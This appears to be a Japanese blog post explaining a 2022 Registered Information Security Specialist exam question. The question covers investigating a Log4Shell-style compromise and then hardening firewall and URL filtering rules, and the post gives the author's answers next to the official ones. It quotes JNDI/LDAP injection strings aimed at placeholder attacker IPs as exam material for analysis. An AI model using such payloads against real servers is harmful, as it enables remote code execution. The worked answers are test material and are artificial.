情報処理安全確保支援士の令和4年度 秋季試験 午後Ⅰ 問2の解説を行っていきます。
出題テーマ:セキュリティ侵害
出題テーマとしては『セキュリティ侵害』でした。
脆弱性を突かれてセキュリティ侵害を受け、ログから調査を行ったり、再発防止の対策を行っていくという問題でした。
知識が必要な問題もなく、問題文中のヒントから解答することができる国語の問題だったかと思います。
設問1
【a】の部分として、『runプロセスの外部への通信の有無を確認したところ、IPアドレスが【a】のホストに対して通信を行っていたことが確認できた。また、【a】を確認したところ、海外のIPアドレスであり、予約サーバの通信先として想定されているものではなかった。』とあります。
表3でrunプロセスのプロセスIDを確認すると200となっており、表4でプロセスID:200は『a3.b3.c3.d3』宛に通信を行っていますので、こちらが解答となります。
設問2 (1)
下線①としては、『表3の内容から、runプロセスが稼働している原因の追求にはTソフトを調べる必要があると判断した。』とあります。
表3を確認しますと、普段稼働していないはずのrunプロセスのプロセスIDは200ですが、親プロセスのプロセスIDは100となっており、こちらは『java BSoftMain』と普段から稼働しているTソフトのプロセスで、runプロセスとTソフトに何らかのつながりがあると考えることができます。
ということで解答例としては、『runプロセスの親プロセスIDがTソフトになっているから(28文字)』と考えることができます。
設問2 (2)
【b】から考えていきます。
【b】の内容としては、『攻撃者が予約サーバに対して通信を行った。』とあります。
今回攻撃を受けた理由としては図2にあるライブラリXの脆弱性Yを利用した攻撃だと考えられます。
その脆弱性Yを利用したアクセスログが表5にありますので、その時刻が解答となり、『b:13:04:32』となります。
【c】について考えていきます。
内容としては、『予約サーバが、IPアドレス【d】のホストの【e】サービスに【f】というクエリを送った。』とあります。
図2のライブラリXと脆弱性Yの説明として、『攻撃者が、攻撃文字列”${jndi:ladp://a4.b4.c4.d4/Exploit}”を含むHTTPリクエストを送る。攻撃対象のWebサーバにおいて、ライブラリXがログ出力する文字列に該当する当該攻撃文字列が含まれると、ライブラリXはIPアドレスがa4.b4.c4.d4のサーバに対し、LDAPで”Exploit”というクエリを送る。』とあります。
今回攻撃を受けた予約サーバがLDAPの通信を行っているログを表6で確認すると、『c:13:05:50』であることがわかります。
【d】、【e】、【f】もこの一文から判断できます。
【d】としては、表6の宛先にある『d:a8.b8.c8.d8』となります。
【e】としては、表6のサービスである『e:LDAP』となります。
【f】としては、攻撃文字列『“${jndi:ladp://a4.b4.c4.d4/Exploit}”』を含んだリクエストを送ると、LDAPで『“Exploit”』というクエリを送ります。
表5のアクセスログを見ますと、『&{jndi:ldap://a8.b8.c8.d8/JExp}』とありますので、『f:JExp』となります。
設問3 (1)
下線②として、『攻撃が失敗したのは、攻撃者が会員サーバにログインするための利用者IDとパスワードを知らなかったからだと考えた。しかし、E氏は、脆弱性Yは認証前のアクセスでも悪用できる』とあります。
攻撃手法を改めて確認しますと、『攻撃者が、攻撃文字列”${jndi:ladp://a4.b4.c4.d4/Exploit}”を含むHTTPリクエストを送る。攻撃対象のWebサーバにおいて、ライブラリXがログ出力する文字列に該当する当該攻撃文字列が含まれると、ライブラリXはIPアドレスがa4.b4.c4.d4のサーバに対し、LDAPで”Exploit”というクエリを送る。』とあります。
つまり、ログ出力する文字列に該当する当該攻撃文字列が含まれれば攻撃が成立し、ログインできるかできないかという認証は関係ありません。
ということで解答例としては、『ログ出力する文字列に該当する当該文字列が含まれれば攻撃が成立するから(34文字)』となります。
設問3 (2)
下線③として、『予約サーバとは違って攻撃が失敗したのは、別の理由だとD主任に説明した。』とあります。
表2のFWのフィルタリングルールを確認しますと、項番2に予約サーバはインターネット宛の通信が全て許可されています。
会員サーバに関してはフィルタリングルールの記載がなく、一部フィルタリングルールは省略されていますが、注記3に『項番6~11にはDMZ内のサーバとインターネットとの間、及びPC-LANとインターネットとの間の通信に関するルールはない』とありますので、会員サーバが攻撃を受けて、インターネット宛にLDAPで通信しようとした場合は、項番12の拒否に該当することになります。
ということで解答例としては、『会員サーバからインターネット宛のLDAP通信は拒否されるため(30文字)』と考えることができます。
設問4
重要な部分として、『予約サーバを起点とするインターネットへのHTTPS通信は、プロキシサーバを中継させる設定とする。FWフィルタリングルールについて、表2の項番2を削除する。URLフィルタリングルールについて、表8に示す内容で設定する。』とあります。
現状予約サーバはインターネット向けの通信は全て許可されるというセキュリティ的にはザルの状態となっていますので、この点を必要な通信だけを許可するようにURLフィルタリングで制限を行っていくというわけです。
重要な部分として、『工場見学の空き状況はU社のSNSアカウントを利用して、クラウドサービス上の複数のSNS投稿用のサーバに対してHTTPSで定期的に投稿される。』という予約サーバの通信要件があります。
この通信要件を満たすようにURLフィルタリングルールを調整していきましょう。
【g】はアクセス元IPアドレスなので、『g:予約サーバ』であると考えることができます。
【h】は許可リストですので、『h:SNS投稿用のサーバのURL』であると考えることができます。
重要な部分として、『許可リストに”全て”を指定すると、全てのURLへの通信を許可する。拒否リストに”全て”を指定すると、許可リストに指定したURL以外のURLへの通信が拒否される。』とあります。
【i】の拒否リストには『i:全て』であると考えることができます。
公式解答例との比較
私の解答と公式解答を比較してみました。
満点ではないにせよ、少なくとも7割~8割程度は取れているかと思いますので合格ラインには達していると思います。
予想配点はあくまで予想ですので参考程度でお願いします。
出題テーマは『セキュリティ侵害』でした。
基本的には文章中のヒントから解答することができる国語の問題だったかと思います。
総じて、難易度としてはやや易しい~普通だと思います。
配点 |
|||
| 設問1 | a3.b3.c3.d3 | a3.b3.c3.d3 | |
| 設問2 (1) | runプロセスの親プロセスIDがTソフトになっているから(28文字) | runプロセスの親プロセスがTソフトのプロセスであるから | |
| 設問2 (2) | b:13:04:32 c:13:05:50 d:a8.b8.c8.d8 e:LDAP d:JExp |
b:13:04:32 c:13:05:50 d:a8.b8.c8.d8 e:LDAP d:JExp |
|
| 設問3 (1) | ログ出力する文字列に該当する当該文字列が含まれれば攻撃が成立するから(34文字) | ログ出力処理する文字列中に攻撃文字列が含まれれば悪用可能だから | |
| 設問3 (2) | 会員サーバからインターネット宛のLDAP通信は拒否されるため(30文字) | 会員サーバからインターネット宛てのLDAP通信が許可されていないから | |
| 設問4 | g:予約サーバ h:SNS投稿用のサーバのURL i:全て |
g:予約サーバ h:SNS投稿用のサーバのURL i:全て |
引用元
問題および解答例に関しては、独立行政法人 情報処理推進機構(IPA)より引用しています。
YouTube解説動画
情報処理安全確保支援士の問題解説
その他の年度、問題解説は以下のページにまとめております。
